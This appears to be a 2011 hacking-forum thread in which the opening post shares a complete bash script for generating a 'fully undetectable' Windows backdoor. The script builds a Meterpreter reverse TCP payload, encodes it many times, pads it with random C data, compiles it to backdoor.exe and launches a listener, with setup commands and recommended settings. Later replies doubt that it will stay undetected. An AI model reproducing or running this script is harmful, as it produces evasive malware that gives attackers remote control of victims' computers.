Author Topic: Fully Undetectable Backdoor generator for Metasploit (Read 3428 times)

noob · « **on:** December 16, 2011, 06:23:56 pm »

Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:
In order to be able to compile the generated payload we must install the following packages ; Mingw32 gcc which you can install by :
root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils
After the installation we must move our shell-script - Vanish.sh - to default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14 .
Note: By default Script Generates Reverse TCP Payload but you can change it some modifications in Script [vanish.sh]. Virus Scan Report of Backdoor shows that its almost undetectable by most of the Antivirus programs.Code:

Code: [Select]

#!/bin/bash
# check if file exist that is msfpayload, msfcli etc...
echo "************************************************************"
echo "    Fully Undetectable Metasploit Payload generaor Beta     "
echo "        Original Concept and Script by Astr0baby            "
# Thanks to astr0baby ;)
echo "     Stable Version of Script is Edited by Vanish3r         "
echo "    Video Tutorial by Vanish3r - www.securitylabs.in        "
echo " Powered by TheHackerNews.com and securitylabs.in           "
echo "************************************************************"
# run as root
if [ "$(id -u)" != "0" ]; then
   echo "This script must be run as root" 1>&2
   exit 1
fi
ping localhost -c 5 >nul

# Giving Fresh new start so removing old junk
rm -rf seclabs
# if  builtin type -p i686-w64-mingw32-gcc > /dev/null ; then 
# else echo "Please install by Command: apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils"
# echo "exiting.....";  exit
# fi
echo "Network Device On your Computer :"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "Which Interface to use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo -e "Please enter a random seed number 1-10000, the larger the number the larger the resulting executable : \c"
read seed
echo -e "How many times you want to encode ? 1-20 : \c"
read enumber
# Get OS name
OS=`uname`
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
esac
echo "Current Ip is : $IP"
ping localhost -c 5 >nul
./msfpayload windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/shikata_ga_nai -c $enumber -t raw | ./msfencode -e x86/jmp_call_additive -c $enumber -t raw | ./msfencode -e x86/call4_dword_xor -c $enumber -t raw |  ./msfencode -e x86/shikata_ga_nai -c $enumber  > test.c  
mkdir seclabs
mv test.c seclabs
cd seclabs
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp
echo 'unsigned char ufs[]=' >> temp
for (( i=1; i<=10000;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp2
sed -i 's/$/"/' temp2
sed -i 's/^/"/' temp2  
echo  ';' >> temp2  
cat temp2 >> temp
cat ready.c >> temp
mv temp ready2.c
echo ";" >> ready2.c
echo "int main(void) { ((void (*)())micro)();}" >> ready2.c  
mv ready2.c final.c
echo 'unsigned char tap[]=' > temp3
for (( i=1; i<=999999;i++ )) do echo $RANDOM $i; done | sort -k1| cut -d " " -f2| head -$seed >> temp4
sed -i 's/$/"/' temp4
sed -i 's/^/"/' temp4
echo  ';' >> temp4
cat temp4 >> temp3
cat temp3 >> final.c  
#Cleanup of junk useless files :P
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2 
rm -f temp3
rm -f temp4
rm -f nul 

# compiling..
/usr/bin/i586-mingw32msvc-gcc -Wall ./final.c -o ./final.exe > /dev/null 2>&1
mv final.exe backdoor.exe
filex=`ls -ct1 | head -1`
sumx=`sha1sum $filex`
echo $filex "...generated in seclabs subfolder"
echo $filex "sha1checksum is .." $sumx  
strip --strip-debug $filex
cd ..
echo "      starting the meterpreter listener..."
sleep 2
ping localhost -c 5 >nul
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$IP LPORT=$port E

FuyuKitsune · « **Reply #1 on:** December 16, 2011, 08:23:06 pm »

So a FUD Metasploit crypter? Nice but I think crypters shouldn't be released so publicly. It'll be detected in a few weeks.

btw, does Jotti distrbute samples to AV vendors?

Kulverstukas · « **Reply #2 on:** December 16, 2011, 09:35:59 pm »

Quote from: FuyuKitsune on December 16, 2011, 08:23:06 pm

btw, does Jotti distrbute samples to AV vendors?

Yes. It's there in their policy.

ande · « **Reply #3 on:** December 17, 2011, 06:20:54 pm »

Like already mentioned, unless this is completely polymorphic. This is going to be not so FUD in a few weeks.

Tsar · « **Reply #4 on:** December 17, 2011, 08:45:16 pm »

Quote from: ande on December 17, 2011, 06:20:54 pm

Like already mentioned, unless this is completely polymorphic. This is going to be not so FUD in a few weeks.

And even then if the code is out, there are ways to detect polymorphic code.

m0rph · « **Reply #5 on:** December 18, 2011, 04:42:07 pm »

Yeah I'm not impressed. It just gives you an interface to select how many times you want to encode a reverse tcp meterpreter payload, adds some C code that sets a void pointer to some random garbage, cross compiles the result, and opens the metasploit client. Basically...this is just another way for noobs to do even more noob things with a noob script, and not learn anything.

The only reason this would create something FUD is because of the amount of times it will encode using different encoders. I don't know if traffic between meterpreter and metasploit is encrypted (with something like TLS), but if it's not then any heuristic based anti-virus/IDS/IPS would still be able to stop this. Even more so if the aforementioned systems were capable of stateful packet inspection.